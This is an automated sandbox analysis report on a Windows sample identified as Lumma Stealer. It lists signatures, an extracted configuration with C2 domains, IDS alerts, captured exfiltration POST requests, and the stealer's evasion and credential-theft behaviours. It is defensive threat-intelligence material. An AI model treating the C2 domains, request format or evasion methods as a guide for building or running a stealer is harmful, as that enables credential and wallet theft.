
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1545194
MD5: 65af596c495031434154ebb5e6eb462f
SHA1: 3173f8c46d141b5df11700b69b64a92fe4f85730
SHA256: e907eb01f5e06ae6692bae8a41628c3e754009316875627b594e090d380488d3
Tags: exe, user-Bitsight

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Entry point lies outside standard sections
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 1408 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 65AF596C495031434154EBB5E6EB462F)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: -
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["thumbystriw.store", "necklacedmny.store", "founpiuer.store", "navygenerayk.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000003.2199066986.0000000000F98000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 1408 | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
Process Memory Space: file.exe PID: 1408 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: file.exe PID: 1408 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP:Port | Destination IP:Port | Protocol
2024-10-30T08:22:11.689997+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6:49710 | 188.114.96.3:443 | TCP
2024-10-30T08:22:12.907514+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.6:49711 | 188.114.96.3:443 | TCP
2024-10-30T08:22:11.689997+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.6:49710 | 188.114.96.3:443 | TCP
2024-10-30T08:22:12.907514+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.6:49711 | 188.114.96.3:443 | TCP
2024-10-30T08:22:11.163524+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49710 | 188.114.96.3:443 | TCP
2024-10-30T08:22:12.359132+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49711 | 188.114.96.3:443 | TCP
2024-10-30T08:22:13.763866+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49713 | 188.114.96.3:443 | TCP
2024-10-30T08:22:14.983235+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49719 | 188.114.96.3:443 | TCP
2024-10-30T08:22:16.565849+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49725 | 188.114.96.3:443 | TCP
2024-10-30T08:22:18.379285+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49736 | 188.114.96.3:443 | TCP
2024-10-30T08:22:20.185206+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49748 | 188.114.96.3:443 | TCP
2024-10-30T08:22:22.420516+0100 | 2057124 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:49764 | 188.114.96.3:443 | TCP
2024-10-30T08:22:10.469901+0100 | 2057129 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:62708 | 1.1.1.1:53 | UDP
2024-10-30T08:22:10.481879+0100 | 2057127 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:60505 | 1.1.1.1:53 | UDP
2024-10-30T08:22:10.514628+0100 | 2057123 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:60730 | 1.1.1.1:53 | UDP
2024-10-30T08:22:10.450006+0100 | 2057131 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:62744 | 1.1.1.1:53 | UDP
2024-10-30T08:22:10.496016+0100 | 2057125 | 1 | Domain Observed Used for C2 Detected | 192.168.2.6:54347 | 1.1.1.1:53 | UDP
2024-10-30T08:22:14.287670+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.6:49713 | 188.114.96.3:443 | TCP


              AV Detection

Source: file.exe | Avira: detected
Source: file.exe.1408.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["thumbystriw.store", "necklacedmny.store", "founpiuer.store", "navygenerayk.store", "fadehairucw.store", "crisiwarny.store", "scriptyprefej.store", "presticitpo.store"], "Build id": "4SD0y4--legendaryy"}
Source: file.exe | ReversingLabs: Detection: 36%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: scriptyprefej.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: navygenerayk.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: founpiuer.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: necklacedmny.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: thumbystriw.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: fadehairucw.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: crisiwarny.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: presticitpo.store
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.2293026262.00000000006A1000.00000040.00000001.01000000.00000003.sdmp | String decryptor: 4SD0y4--legendaryy
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2

              Networking

Source: Network traffic | Suricata IDS: 2057131 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store) : 192.168.2.6:62744 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057125 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store) : 192.168.2.6:54347 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057129 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store) : 192.168.2.6:62708 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057127 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store) : 192.168.2.6:60505 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49719 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49725 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49764 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057123 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store) : 192.168.2.6:60730 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49736 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49748 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2057124 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (necklacedmny .store in TLS SNI) : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49711 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49713 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
Source: Malware configuration extractor | URLs: thumbystriw.store
Source: Malware configuration extractor | URLs: necklacedmny.store
Source: Malware configuration extractor | URLs: founpiuer.store
Source: Malware configuration extractor | URLs: navygenerayk.store
Source: Malware configuration extractor | URLs: fadehairucw.store
Source: Malware configuration extractor | URLs: crisiwarny.store
Source: Malware configuration extractor | URLs: scriptyprefej.store
Source: Malware configuration extractor | URLs: presticitpo.store
Source: Joe Sandbox View | IP Address: 188.114.96.3
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 52 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 12864 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 15110 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 19968 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1222 | Host: necklacedmny.store
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 571731 | Host: necklacedmny.store
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (5 occurrences)
Source: global traffic | DNS traffic detected: DNS query: presticitpo.store
Source: global traffic | DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic | DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic | DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic | DNS traffic detected: DNS query: necklacedmny.store
Source: unknown | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: necklacedmny.store
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.c.lencr.org/0
Source: file.exe, 00000000.00000003.2226955784.000000000591E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://x1.i.lencr.org/0
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000EF4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2198903513.0000000000F90000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/
Source: file.exe, 00000000.00000002.2294200437.0000000000F91000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/H
Source: file.exe, 00000000.00000003.2211713187.0000000000F92000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/X
Source: file.exe, 00000000.00000003.2226542489.00000000058ED000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/api
Source: file.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiC
Source: file.exe, 00000000.00000003.2211518965.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apiS
Source: file.exe, 00000000.00000002.2294200437.0000000000F41000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2270741632.0000000000F99000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2288823700.0000000000FA9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store/apip
Source: file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/api
Source: file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/api.default-release/key4.dbPK
Source: file.exe, 00000000.00000002.2294200437.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://necklacedmny.store:443/apiK
Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2199743010.000000000592B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199805481.0000000005929000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2199943565.0000000005929000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2228046825.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.or
Source: file.exe, 00000000.00000003.2228046825.000000000591B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: file.exe, 00000000.00000003.2227771592.0000000005A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: file.exe, 00000000.00000003.2228118803.00000000058F3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49719 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49748 version: TLS 1.2

              System Summary

              Source: file.exe | Static PE information: section name: (unprintable section name)
              Source: file.exe | Static PE information: section name: .idata
              Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: file.exe | Static PE information: Section: (unprintable section name) ZLIB complexity 0.9981081014890282
              Source: file.exe | Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@1/0@5/1
              Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
